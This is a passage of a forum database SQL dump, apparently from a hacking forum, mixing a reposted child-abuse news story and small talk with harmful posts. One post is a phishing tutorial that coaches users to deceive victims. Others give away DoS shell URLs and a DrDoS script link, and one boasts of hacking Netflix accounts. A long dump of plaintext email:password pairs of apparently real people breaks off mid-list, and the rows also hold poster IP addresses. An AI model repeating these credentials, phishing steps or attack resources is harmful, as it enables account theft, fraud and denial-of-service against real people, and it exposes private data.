Permanently Damaged\'\r\nAuthorities became suspicious when they noticed the eye drops Jennifer Mothershead had been administering to her 15-month-old daughter had a strange odour\r\nMotherhead has pleaded not guilty\r\nBy Daily Mail UK 1 May 2012 \r\n\r\nA mother from Washington has been charged with assault after it was alleged she repeatedly put bleach into her young daughter’s eyes. \r\n\r\nJennifer Mothershead, 29 from Bonney Lake, is thought to have caused permanent vision loss in her 15-month-old daughter’s right eye. \r\n\r\nAuthorities became suspicious in May last year when the little girl was airlifted from Tacoma to Seattle’s Harborview Medical Center after suffering a blow to the head, according to Q13 FOX News.\r\n\r\n[img]http://i.dailymail.co.uk/i/pix/2012/05/01/article-0-12DB1075000005DC-253_634x344.jpg[/img]\r\n\r\n When she was treated, medical staff observed a previously diagnosed eye condition had got worse. \r\nDoctors became suspicious that the head injury was a result of abuse and called the Pierce County Sheriff’s Department. \r\n\r\nMothershead did not explain how her daughter had got the head injury, and according to a detective, did not show any emotion about the girl’s injuries. The 15-month-old was taken into protective custody. \r\n\r\nWhen hospital staff and detectives examined the girl’s eye drops that she had been using for her condition more closely, they noticed they had a strong smell. \r\n\r\nA detective tested a few drops on his wrist and said they caused a minor burning sensation.\r\n\r\n \'One of the things our detectives were concerned about was a lack of concern for the toddler from the mom and we started looking into it,\' Pierce County Sheriff\'s Department spokesman Ed Troyer told Q13 FOX News. \r\n\r\n\'We found one of the eye drop bottles of chemicals, which basically burned our detectives. It obviously wasn’t something that should be going in someone’s eyes.\'\r\n\r\nThe eye drops were sent for testing to the Food and Drug Administration’s Forensic Chemistry labs, where scientists found that they contained bleach.\r\n\r\n The eye injuries suffered by the little girl matched up with the symptoms of bleach exposure and she had suffered to such an extent that medical staff ruled out the possibility that the dropper had simply been cleaned with bleach. \r\n\r\nThe girl\'s condition has improved, but doctors say she has permanently lost vision in her right eye. \r\n\r\nNow two years old, she has been living with her father since last spring. \r\n\r\nMothershead has pleaded not guilty and her bail was set at $150,000.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '46374f46a993e9e885aa02d10034a365', '0', '0'); INSERT INTO mybb_posts VALUES('3015', '624', '0', '42', 'Aliens Found In Brazil (Photos - Fake or Real)?', '0', '82', 'iTzIpod', '1349037413', '[align=center][b][size=large][color=#FF0000]Strange photo shows the world the British tabloid Daily Mail. The pictures of the tropical undergrowth on a group of people watching the unusual creature like an alien. A right of another strange sight, a thick shiny blob.[/color][/size]\r\n\r\n[img]http://www.odditieszone.com/wp-content/uploads/2011/10/alien-brazil-1.jpg[/img]\r\n\r\n[img]http://www.odditieszone.com/wp-content/uploads/2011/10/alien-brazil-2.jpg[/img]\r\n\r\n[img]http://www.odditieszone.com/wp-content/uploads/2011/10/alien-brazil-3.jpg[/img]\r\n\r\n[size=large][color=#FF4500]What do you guys think?[/color][/size][/b][/align]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5d626669886ea538db1e37b4bb0dfb60', '0', '0'); INSERT INTO mybb_posts VALUES('3016', '624', '3015', '42', 'RE: Aliens Found In Brazil (Photos - Fake or Real)?', '0', '1', 't3h jok3r', '1349038419', 'They seem to be real. If there is life on earth then I believe there is more life out side of Earth.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '944bee1bac45f3a0c0252e05d9cb1078', '0', '0'); INSERT INTO mybb_posts VALUES('3017', '624', '3015', '42', 'RE: Aliens Found In Brazil (Photos - Fake or Real)?', '0', '82', 'iTzIpod', '1349038557', 'That\'s actually quite try.\n\n[quote]\nIf there is life on earth then I believe there is more life out side of Earth.\n[/quote]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '735d0aac48972fb0ba55a34ef75010bc', '0', '0'); INSERT INTO mybb_posts VALUES('3018', '601', '2993', '3', 'RE: Major Announcement by Jok3r!', '0', '1', 't3h jok3r', '1349038705', '[quote=\'iTzIpod\' pid=\'2993\' dateline=\'1349026259\']\r\n3 Admins? O_o \r\n\r\n\r\nSeems legit.\r\n\r\n\r\nUnless he demotes Apathy and then promotes you.\r\n[/quote]\r\nApathy is a long term Admin and there can be 3 admins I have no problem having 3 admins but when the site gets bigger than 3 admins are reasonable.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '440ef981b74bca04dd4884ff395b9b6a', '0', '0'); INSERT INTO mybb_posts VALUES('3019', '625', '0', '61', 'Runescape Phishing Tutorial', '0', '82', 'iTzIpod', '1349039715', 'Hello, today I will be showing you a runescape phisher. This is NOT mine. This was made by Karen and Tuffs from Runemart.com.\r\n\r\nFirst you will need to go to their website.\r\n\r\nhttp://p.hish.it\r\n\r\nWhen you arrive at the website, it will look like this.\r\n\r\n[URL=http://imageshack.us/photo/my-images/339/68565896.png/][IMG]http://imageshack.us/a/img339/3920/68565896.png[/IMG][/URL]\r\n\r\nNext step is to register a account.\r\nClick the register button located near the top of the screen and you will be brought to this page below.\r\n\r\n[URL=http://imageshack.us/photo/my-images/827/33160529.png/][IMG]http://imageshack.us/a/img827/8731/33160529.png[/IMG][/URL]\r\n\r\nOnce you have created your account, login and you should be presented with this page.\r\n\r\n[URL=http://imageshack.us/photo/my-images/651/61146165.png/][IMG]http://imageshack.us/a/img651/5638/61146165.png[/IMG][/URL]\r\n\r\nTo make your phising site, requires hardly any effort at all. P.hish.it create you a website for free. To me it looks pretty legit, if you dont look at the url bar.\r\n\r\nGo to the phising tab, click links and you should see a orange box containing a warning message.\r\n\r\n[URL=http://imageshack.us/photo/my-images/854/98373517.png/][IMG]http://imageshack.us/a/img854/2535/98373517.png[/IMG][/URL]\r\n\r\nWarning! You must set up a domain first, by clicking [u]here[/u]. Click the word \"here\" and you will be taken to this page.\r\n\r\n[URL=http://imageshack.us/photo/my-images/571/67890073.png/][IMG]http://imageshack.us/a/img571/3889/67890073.png[/IMG][/URL]\r\n\r\nOn this page, you can choose what domain and subdomain you want to use for your phising links. You can also give permissions to certain people within your team but we wont go into detail on that.\r\n\r\nClick submit in the bottom right corner and go back to the link page. You should see that your links have changed and now have the domain and subdomain you chose to use.\r\n\r\n[URL=http://imageshack.us/photo/my-images/836/29557660.png/][IMG]http://imageshack.us/a/img836/6496/29557660.png[/IMG][/URL]\r\n\r\nWhen your target clicks the link he will be taken to this page \r\n\r\n[URL=http://imageshack.us/photo/my-images/189/38185978.png/][IMG]http://imageshack.us/a/img189/4910/38185978.png[/IMG][/URL]\r\n\r\nIt\'s a pretty convincing site if your target doesn\'t notice the fake url. I had a person today who said SCAM. I simply told him a load of bullshit and he ended up entering his information in.\r\n\r\nSome people may notice it but try to convince them it works. If they don\'t go along with it, leave them and try to get another target.\r\n\r\nIf you want ways of attracting people to your links. Either make a youtube channel with a video and advertise over youtube or you can create or get a few hacked accounts and spam on them saying Want FREE members ? Search \"Youtubenamehere\" on youtube.\r\n\r\nPlease leave a thank you if this tutorial has helped you and feel free to tell me if I need to improve something.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9a81e6d6351046844ae8909296ae78bc', '0', '0'); INSERT INTO mybb_posts VALUES('3020', '626', '0', '19', '[Junk]?? Best Free Private DoS Shells ?? 57 Private Free Shells', '0', '82', 'iTzIpod', '1349040117', '[size=medium][font=Trebuchet MS][align=center]Okay so today I got bored and use a special method of mine and within 30 Minutes I got around 57 DoS Shells, since I don\'t know what to do with them I decided to give them away.\r\n\r\nScreenies: 10 Second Attacks\r\n[spoiler][img]http://i.imgur.com/7JCyl.jpg[/img][/spoiler]\r\nTEST SHELLS:\r\nhttp://www.atwservice.com/media.php\r\nhttp://wastebook.com/burner.php\r\n\r\n[color=#FF0000]So to get 55 more hard hitting DoS shells post here and PM me thanks.[/color]\r\n[/align][/font][/size]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a12eca0e8acad035c727dda977746d56', '0', '0'); INSERT INTO mybb_posts VALUES('3021', '604', '2998', '61', 'RE: Unique Sig and Header', '0', '1', 't3h jok3r', '1349041269', '[quote=\'R?????zo?\' pid=\'2998\' dateline=\'1349028513\']\r\nif you really want something like that, i can make it no problems.\r\ni will do that if it\'s going to be used though, else will be a waste of time.\r\n[/quote]\r\n\r\nI agree no one would take out time and waste their energy to think they after they finally make something someone decides to not use it anymore.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'e72e15e1a5ba71b44f9ccb43c16dceb0', '0', '0'); INSERT INTO mybb_posts VALUES('3022', '601', '2914', '3', 'RE: Major Announcement by Jok3r!', '0', '3', '??????????¢™', '1349044654', 'Sounds good to me Joker', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', 'e5e55efd66b354f4c403006757435bef', '0', '0'); INSERT INTO mybb_posts VALUES('3023', '624', '3015', '42', 'RE: Aliens Found In Brazil (Photos - Fake or Real)?', '0', '1', 't3h jok3r', '1349048518', 'What do you mean to say?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c7ae6450f3d628e0d927f2aee56f85c5', '0', '0'); INSERT INTO mybb_posts VALUES('3024', '624', '3015', '42', 'RE: Aliens Found In Brazil (Photos - Fake or Real)?', '0', '82', 'iTzIpod', '1349048615', 'I meant to say that I agree with what you said.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b9603f8da7aa8149dcf091fcb35afa40', '0', '0'); INSERT INTO mybb_posts VALUES('3025', '514', '2551', '9', 'RE: How to make serious money', '0', '1', 't3h jok3r', '1349048634', 'That\'s a very complicated process. It\'s better to just send the email by copying the template.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ae63043adb705972fc11651b24ba36a4', '0', '0'); INSERT INTO mybb_posts VALUES('3026', '624', '3015', '42', 'RE: Aliens Found In Brazil (Photos - Fake or Real)?', '0', '100', '??zg???g????61', '1349048755', 'I lol\'d no way theres aliens xDD', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'abd3eb937e62d06b54c056aed907af4b', '0', '0'); INSERT INTO mybb_posts VALUES('3027', '627', '0', '33', 'What can I do to improve this?', '0', '82', 'iTzIpod', '1349048760', '[img]http://i.imgur.com/sI4LV.png[/img]\r\n\r\nWhat do you think I can do to improve this picture? \r\n\r\nOr if you want, download the .PSD file and then edit the things :p \r\nAnd then show me your results.\r\n\r\n(Please upload the .PSD file once you\'re done so I can see what you did.)\r\n\r\nDownload: http://lh.rs/f3CSmwFQpbY8\r\n\r\n\r\n:p I know, I suck at GFX.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '31d3e81d087941548a7a1a654fa8c113', '0', '0'); INSERT INTO mybb_posts VALUES('3028', '624', '3026', '42', 'RE: Aliens Found In Brazil (Photos - Fake or Real)?', '0', '82', 'iTzIpod', '1349048824', '[quote=\'GRONgamer61\' pid=\'3026\' dateline=\'1349048755\']\nI lol\'d no way theres aliens xDD\n[/quote]\n\nGet on Skype and lol for me please. :p\n\nEDIT: Your laugh is so funny :p', '24.212.197.164', '416597412', '1', '0', '82', '1349049098', '1', 'e7bb1cf3c11870e2962d95bdf71ebaec', '0', '1349049098'); INSERT INTO mybb_posts VALUES('3029', '624', '3024', '42', 'RE: Aliens Found In Brazil (Photos - Fake or Real)?', '0', '1', 't3h jok3r', '1349048847', '[quote=\'iTzIpod\' pid=\'3024\' dateline=\'1349048615\']\r\nI meant to say that I agree with what you said.\r\n[/quote]\r\nWell there\'s another part of me that says the aliens are fake because there\'s not hardcore proof that aliens exist and anyone can edit a pic.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '03d06bdb51bfcfcdb03b69237386fb77', '0', '0'); INSERT INTO mybb_posts VALUES('3030', '564', '2793', '7', 'RE: What Do You Do To Relax?', '0', '1', 't3h jok3r', '1349048967', 'I like prison break too lol. I\'m going to watch in a few mins.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f55b88f0e22cd4a08e71a68f61436f91', '0', '0'); INSERT INTO mybb_posts VALUES('3031', '564', '2793', '7', 'RE: What Do You Do To Relax?', '0', '82', 'iTzIpod', '1349049010', 'Finished the series like I said. Just hacked 3 Netflix accounts.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '89a921b1850e9c87ba4b819ad0a76f6e', '0', '0'); INSERT INTO mybb_posts VALUES('3032', '508', '2538', '13', 'RE: Awesome deface page source + PSD', '0', '8', 'spacefish36', '1349049251', 'No problem enjoy when you deface a site lemme know', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '2be0acc0c3fa3edabd1e2dd2eba70716', '0', '0'); INSERT INTO mybb_posts VALUES('3033', '351', '1651', '46', 'RE: Phishing Tutorial', '0', '8', 'spacefish36', '1349049375', 'Good Luck Apathy and what site are you going to try it on?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'e7f7f45ba27f355514ac0e6146eec27d', '0', '0'); INSERT INTO mybb_posts VALUES('3034', '509', '2539', '21', 'RE: The world of DDoS Attacks', '0', '8', 'spacefish36', '1349049514', 'I kinda understood what you meant and hope you enjoy the tutorial. I hope jok3r saw this cuz this is helpful for him.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'b841277b977e54c7f0dd20d5617706c1', '0', '0'); INSERT INTO mybb_posts VALUES('3035', '615', '3004', '21', 'RE: Could somone test the output of 2 differen\'t booters I use?', '0', '8', 'spacefish36', '1349049598', 'What do you mean? Like DDoS a site and check if it works or help you finish it up?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '7ad56a455cfa8b5e637063b3fe9ccba4', '0', '0'); INSERT INTO mybb_posts VALUES('3036', '601', '2914', '3', 'RE: Major Announcement by Jok3r!', '0', '8', 'spacefish36', '1349049694', 'Welcome back Reborn I remember yea.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '3e260b2feead2cd0f3ecccaec5e8096d', '0', '0'); INSERT INTO mybb_posts VALUES('3037', '615', '3004', '21', 'RE: Could somone test the output of 2 differen\'t booters I use?', '0', '100', '??zg???g????61', '1349049708', 'sorry I mean I need a dstat but I don\'t know how to do that XDDD', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '5a3b2690587c382400d59bb9ecee0f4b', '0', '0'); INSERT INTO mybb_posts VALUES('3038', '622', '3013', '42', 'RE: Founder of the Pirate Bay Gottfrid Svartholm Arrested in Cambodia', '0', '8', 'spacefish36', '1349049746', 'Sucks and he looks too young.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '96f8a625d8d9939cb9de9b7b0c9eeaff', '0', '0'); INSERT INTO mybb_posts VALUES('3039', '616', '3005', '67', 'RE: [PHP] IP Grabbing Script', '0', '8', 'spacefish36', '1349049863', 'It\'s the right section because you explained how to upload it and where.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '058fd0f0d35f0167bcac346e90269066', '0', '0'); INSERT INTO mybb_posts VALUES('3040', '616', '3005', '67', 'RE: [PHP] IP Grabbing Script', '0', '82', 'iTzIpod', '1349049923', 'Alright thank you! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6e3afd1860f0a4e5d46ffcb811549eae', '0', '0'); INSERT INTO mybb_posts VALUES('3041', '587', '2950', '65', 'RE: Who likes the Rocky Films?', '0', '8', 'spacefish36', '1349049931', '[quote=\'mothered\' pid=\'2950\' dateline=\'1349005338\']\r\n[quote=\'Romdu62\' pid=\'2903\' dateline=\'1348970512\']\r\nNever heard of rocky films before.\r\n[/quote]\r\n\r\nSo you\'ve never heard of \"Rocky Balboa?\"\r\n\r\nThat has to be a first. Nonetheless, check It out and see what you think.\r\n[/quote]\r\nLol ive also never heard of me. Who is rockey?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'e683ac0deb8a563de8c47788eb282130', '0', '0'); INSERT INTO mybb_posts VALUES('3042', '190', '665', '56', 'RE: Copy and paste game', '0', '8', 'spacefish36', '1349049996', 'http://forumtopsites.net/index.php?a=in&u=joker', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '87e43b4e64264f08015b2ac8682c4974', '0', '0'); INSERT INTO mybb_posts VALUES('3043', '488', '2355', '8', 'RE: What are you listening to?', '0', '8', 'spacefish36', '1349050034', 'I\'m listening to nothing at the moment', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'da645f4eb32954c76d012dd1779884d9', '0', '0'); INSERT INTO mybb_posts VALUES('3044', '628', '0', '19', '[Junk]Spoiler Test', '0', '3', '??????????¢™', '1349050161', 'I am checking to see if we have spoilers and if they work.\r\n[spoiler]TEST THIS OUT [/spoiler]', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', 'f0debb5fe8cfb4811ff616fdee3a9e2d', '0', '0'); INSERT INTO mybb_posts VALUES('3045', '628', '3044', '19', 'RE: Spoiler Test', '0', '1', 't3h jok3r', '1349050198', 'Lol completed. Done done done', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8124355ad872fcf7ec39e7c6f2dddfe4', '0', '0'); INSERT INTO mybb_posts VALUES('3046', '628', '3044', '19', '[Junk]Spoiler Test', '0', '3', '??????????¢™', '1349050226', 'This thread has been junked.', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('3047', '629', '0', '21', '[FREE] Giving Away DrDos Script [FREE]', '0', '100', '??zg???g????61', '1349104357', '[align=center]Hey everyone, I\'m giving out a DrDos script. Heres the link everyone- http://pastebin.com/EgnhCsGm\n\nEnjoy ;D [/align]', '46.249.57.80', '1096865674', '1', '0', '100', '1350921872', '1', 'be03975386c1524682ce88432ded53f1', '0', '1350921872'); INSERT INTO mybb_posts VALUES('6131', '1041', '5994', '81', 'RE: How to get a FREE Skype Resolver/Cloudflare Resolver', '0', '100', '??zg???g????61', '1350921902', 'No problem ;D', '96.237.179.21', '1626190613', '1', '0', '0', '0', '1', 'bde404d6a5f24e2c066317557e5545b0', '0', '0'); INSERT INTO mybb_posts VALUES('3048', '488', '2355', '8', 'RE: What are you listening to?', '0', '82', 'iTzIpod', '1349050416', 'Same here. I\'m just listening to my brother playing CoD I guess...', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '23c05782a679979247fb5a1c5b4107e6', '0', '0'); INSERT INTO mybb_posts VALUES('3049', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1349050454', 'http://www.sigtutorials.com/tutorials/basics/fire-effect-signature-tutorial.html\n\nI was showing a friend this tutorial :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '26e4329a50315879467841181056ed0f', '0', '0'); INSERT INTO mybb_posts VALUES('3050', '604', '2928', '61', 'RE: Unique Sig and Header', '0', '82', 'iTzIpod', '1349050960', 'Agreed. But I\'m not that type of guy that will ask someone to do something and then not use it anymore. :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ab0fa749c0b98219eecdad68936046af', '0', '0'); INSERT INTO mybb_posts VALUES('3051', '601', '3036', '3', 'RE: Major Announcement by Jok3r!', '0', '3', '??????????¢™', '1349051062', '[quote=\'spacefish36\' pid=\'3036\' dateline=\'1349049694\']\r\nWelcome back Reborn I remember yea.\r\n[/quote]\r\nThanks for the warm welcome.', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', '8892fa1bd59827dcacaa4be6859fe8a5', '0', '0'); INSERT INTO mybb_posts VALUES('3052', '630', '0', '19', '[Junk]Why So? TEST', '0', '3', '??????????¢™', '1349051153', '[b]OPEN[/b]\r\n[spoiler]WHY SO UGLY?[/spoiler]', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', 'a0830e2cfa5a7cdbf6ab5ba749cfd30e', '0', '0'); INSERT INTO mybb_posts VALUES('3053', '630', '3052', '19', 'RE: Why So? TEST', '0', '1', 't3h jok3r', '1349051181', 'Lol lol trollolool hehehehe', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0fdbb6d9de0acda398e9cfbed32ca138', '0', '0'); INSERT INTO mybb_posts VALUES('3054', '630', '3052', '19', '[Junk]Why So? TEST', '0', '3', '??????????¢™', '1349051227', 'This thread has been junked.', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('3055', '631', '0', '61', '45565 Shells', '0', '82', 'iTzIpod', '1349051556', 'Damn. That\'s a lot of shells! :D\n\n\nTo View: http://adf.ly/DK8lr\n\n\n- iTzIpod\n\n\nEnjoy!', '24.212.197.164', '416597412', '1', '0', '82', '1349051582', '1', '86ed37d1f1eb29f576e03afd928fb93e', '0', '1349051582'); INSERT INTO mybb_posts VALUES('3056', '632', '0', '61', '1000 Emails Dump', '0', '82', 'iTzIpod', '1349051700', 'Just got it, enjoy!\n\n[spoiler]\n[quote]charles247@web.de:247charles\ncharlotte.emm.x@hotmail.com:fashiongirl13\nchavagolem@hotmail.com:harlequin13\nchaotic.91@hotmail.com:britney77\nchelseaprincess08@live.co.uk:kissme123\nceol@sapo.pt:863568\nlawrn99@gmail.com:18361836\nkrwrawlings@gmail.com:bristolcity1\nkyeaboat@gmail.com:odeneho1\nmanishkannojia@gmail.com:janemann\nlecouteloewe@gmail.com:chispass\ndanielle@df-designs.us:goldpen92\ndanceteam018@aol.com:mauser12\ndalachance@aol.com:francis1\ndance_chic_08@hotmail.com:froggy08\ncindy.hawk@comcast.net:1101happy\nchloepollard@hotmail.com:therapeutic\nDanni_Poisened_Ivy@hotmail.com:boltonwanderers\ndanwadlan@ovi.com:alison46\nDamitaJo79@sbcglobal.net:Asserac79\ndani_27@live.co.uk:c@r3b3@r\ndanibucaro@yahoo.com:almagemela\ndanielle.roughan@yahoo.co.uk:camera101\ndanceranji@yahoo.com:daretodance\ndanaheard@live.com:jasmay123\ndannyboo1997@yahoo.com:no1butme\ndasinas@hotmail.com:mv220506\ndarknessdj@msn.com:10091982\ndavejag@comcast.net:11Bernard08\ndarshakmendapara@yahoo.com:161288\ndarwinmiguel50@yahoo.com:Kickboxi3ng\ndano07@verizon.net:hunnybunny007\ndavidwhelan011074@yahoo.co.uk:moonshine123\ndarioperic@hotmail.com:patika22\ndachinchs@yahoo.com:popeye25\ndavid@boscomms.com:astondb9\ndanial.parrott@yahoo.com:harris12\ndave@daveflower.com:charlie4\ndarcybrown88@yahoo.com:dars4one\ndanixnx@hotmail.com:22121989\ndavemuraco@in-the-zone.biz:andrew3113\ndanielsdanasha@yahoo.com:danasha12\ndavid.westray@hotmail.com:freckles12\ndartcarwash2@yahoo.com:remix12800\ndave@wwwebb.co.uk:823824\ndavispj159@hotmail.com:rdrury57\ndavidtorr001@aol.com:good2345\ndarkstrifynax@yahoo.com:cinemabizarre\ndariuszhiheng@hotmail.com:96702774\ncutie5950@aim.com:mileyworld.com\ndavidjmazz@yahoo.com:honeysolo1\ndcarlson@interbaun.com:under7over\ndazlingdora@live.co.uk:fishandchips\ndawn@noangel.wanadoo.co.uk:marion1801\ndanielle_nichole1990@yahoo.com:may201990\ndebbiedixie@hotmail.co.uk:firemansam\ndarryl.gillies@bigpond.com:lootytooty9\ndbyers@cityofrockhill.com:ozzie113\ndawnhamann@hotmail.com:hornie69\ndazdww@yahoo.co.uk:spurks12\ndee@escapadebabes.com:kuk64x6hl\ndavisjrw@comcast.net:135avenct\ndavid_aird@btinternet.com:453bendybus\ndazigrrl@hotmail.com:da042620\ndearjamon@hotmail.com:d25628az\ndeandra_1998@hotmail.com:325036788\ndebrasbrink@aol.com:cupcake1260\nddcoleman@mchsi.com:blizzard11\ndbabydoll96@aim.com:donalds9\ndeep_purple_stargazer@hotmail.com:darklord1\ndebbiesydenham@yahoo.co.uk:zptheartishot\ndeborock1@yahoo.com:eztarteig57\ndemsexygurlspimpin@yahoo.com:patrick2\nddj7x7@yahoo.com:32753275\ndebbiebrookes@excite.co.uk:lucy120400\ndenisse_gonzalez90@hotmail.com:yvette91\nDayeshaBovell@yahoo.com:china777\ndeanwill46@hotmail.com:bluenose01\nDeeAnne_xi@yahoo.com:pinkdogs\ndebvt@optusnet.com.au:redneck2802\ndavidsnieckus@hotmail.com:macrochef\ndemi.apedaile@hotmail.com:cinderella\ndavidchowcat@hotmail.com:chowcers\ndavanne49@bigpond.com:maxi1011\ndeseanjackson08@aol.com:eagles99\ndennasoriano@yahoo.com:peace1968\nderf916@aol.com:hd00447349\ndeliouswifey08@aol.com:bobby143\ncutietanya@hotmail.co.uk:t066179298\ndeepafrik@hotmail.co.uk:studio111\ndepend017@yahoo.com.tw:youlus403\ndestiny_kiara@live.com:smokey2099\ndelfing@shaw.ca:allright1234\ndenisemcewan@btinternet.com:dennicjam17\ndeiandrap16@yahoo.com:diamondprincess\ndeville93@hotmail.com:chinsey98\ndelfine116@hotmail.com:kyoshiro\ndelta_i4u@yahoo.co.in:debtan76l\ndestiny_xox_52@hotmail.com:skippydo\ndeyarnaachille@yahoo.com:stardoll38\ndeven_o2585@yahoo.co.in:25651391\ndeksa-on01@hotmail.com:5102014932\ndawnbircham@yahoo.co.uk:cossdrop\ndenisebecerra12@yahoo.com:sammy123\ndezii1@yahoo.com:shaybabe1\nDescribMeAsCrazy@aim.com:shantel1\ndeuss0123@hetnet.nl:rtoodtoo\ndennis.bates@yahoo.com:Cody0325\ndeneen@watermarkhospitality.com:Creem0re\ndetjanssen@aol.com:groover76\ndiana_espadas@yahoo.com:carinoso1\ndibyojyotidas@yahoo.co.in:galagali\ndflinn09@apu.edu:buckeye1\nDennis_Morini@hotmail.com:Y23I1two\ndfraged@ymail.com:20031959\nDianaCo@aol.com:cow5267\ndesertglam@hotmail.com:10648000\nDebCrooke@aol.com:BAMAGRAD84\ndestinydaugh@yahoo.com:maryetta\ndiannet2@bigpond.com:daihatsu502\ndiamondcochran14@yahoo.com:starshearts\ndicamillo_23@hotmail.com:yourmom23\ndibrierley@btinternet.com:smudge11\nderek@creative4business.co.uk:austinhealey\ndieta90_yuigon@yahoo.com:24099003\nderverlierte_jagdhund@yahoo.co.uk:rosslyn69\ndi2live@comcast.net:08041990\ndiannebuckminster@mac.com:katie527\ndiproy08@yahoo.com:pmob756982\ndiannpresley@aol.com:helnik13\ncebabes10@yahoo.com:DGHTfmq4\ndiegobombardiere273@hotmail.com:godofwar4746\ndiazcota@hotmail.com:s25562556\ndillan48@hotmail.com:R4M5T1N0\ndianeandwilf@talktalk.net:inverness100\ndivabrat3193@aim.com:ryleigh5\ndimpapachris@yahoo.gr:21316161\nDjehannecherif@hotmail.com:leoleo1608\ndjohnson2oo8@yahoo.com:schoolsu\ndiramahadzir@yahoo.com:sadcases10\nDjranoonworldbeats@yahoo.com:djranob01\ndlh210@lehigh.edu:alexlova\nDivas2009@yahoo.com:lilfantasia\ndiek@ozonline.com.au:PC111202\ndkuzio@telusplanet.net:drew3009\ndinesh_kaushik14@yahoo.com:36361968\ndmama97x@yahoo.com:a010348z\ndixiechicdana@yahoo.com:snuggles2009\ndkatopodis@pegasus.gr:Downfoot\ndhanjalgurpreet@yahoo.com:stareguru\ndirty_knob@hotmail.com:passwords6\ndirectories@abmoldremediationnj.com:Above111\ndino3463@yahoo.com:ronkayin\ndon0510banal@yahoo.com:ching1997\ndonna.boden@hotmail.co.uk:5471pmt.\ndjdeivitt@msn.com:terrano2\nde-ghost@msn.com:ktzij51km\ndhdtv@dhdtv.net:tgo5dbs2\ndohern@tampabay.rr.com:4267anit\ndeewoods7@windstream.net:redmond1\ndonovan1623@yahoo.com:monkey1623\ndiamond.harrell@yahoo.com:iamforever\ndolly14xx@hotmail.co.uk:hollyann1\ndjf292008@hotmail.com:43dj0679\ndo_44@hotmail.co.uk:iamsexy2\ndmoore@citlink.net:viaroma\ndougsgirl63@yahoo.com:slaughter\ndoggylover93@sbcglobal.net:phantom93\ndominique.grier@yahoo.com:Game@Game\ndorinangel@walla.com:051447169\ndon@stephens.net:2548bank\ndr_mim81@yahoo.com:4545454waldegypt81\ndimplesmile16@Aol.com:giggles1\nDkabajunior@yahoo.fr:Filingue\ndongsoo_5137@hotmail.com:8destination\ndomedew@yahoo.com:69695100\ndleeper@mail.com:dayton47\ndoggie.lover9@hotmail.com:doggies9\ndrsanci@yahoo.com:lutfucan\ndopefreshchic@yahoo.com:loveyababe1\ndollz_hannah@yahoo.com:10071985\ndqciclo@yahoo.com.br:taechilenas\ndstefanski99@yahoo.com:johnston\ndopips@yahoo.com:worsewar\ndonnaleebrannen@yahoo.com:sarahbeth\ndoric3@bigpond.com:11salter\nDoglover0214@verizon.net:Doglover44\ndestiny_love_mom@yahoo.com:ssanta08\ndrudderman@msn.com:garbage1\ndrews-jan@gmx.de:Jan7540669\ndr_kuehl@web.de:anne1005\ndrparkin@shaw.ca:beamer\ndrlolo82@yahoo.com:mervat57\nDRXL44@AOL.COM:taratara\ndthelen_10128@yahoo.com:trixie99\ndryder@veerconsulting.com:corvette62\nduffopalao@hotmail.com:160201\ndqhaley26@yahoo.com:hayhay96\ndrandon_george@hotmail.com:canada21\ndjsbiz@westnet.com.au:1Splinter\ndrobac93@hotmail.com:sodara123\ndow.mathis@sbcglobal.net:William09\ndonginew4@yahoo.co.in:thriveni\ndrpkmathur2002@rediffmail.com:04101975\ndurya_ju@yahoo.co.in:650549\ne_esoteric@yahoo.com:peterki1\ndrshahravi@yahoo.com:amirbala\ndrleonardpizzola@comcast.net:lpmp5455\ndsddiamondcompany@yahoo.com:fashion6\nebone_7@yahoo.com:tweety18\ndutchfoxy@hotmail.com:Manon2\ndrewballoo@hotmail.com:easton88\ndrz.shawty@hotmail.com:aventura\ndoggersbeggers@yahoo.co.uk:Erikat123\nedudbmg@yahoo.es:silt281shot880\ndragontower@me.com:dragonworld\ndunefox@lycos.com:justint1\ndonnathewhip@yahoo.com:kittykatty\nednoon@yahoo.com:vatsala52\nedith.friedl@gmx.at:kakikaki\nedwardfelix@cox.net:fatguy999\neddie@one1.co.il:maalent1\neffict@msn.com:umalbaneen\ndkiamos@yahoo.gr:dimitris1969\nElaine@DiRico.com:foodie31\ndynomike4109@yahoo.com:jennylynne\ndrmayawhite2b@ya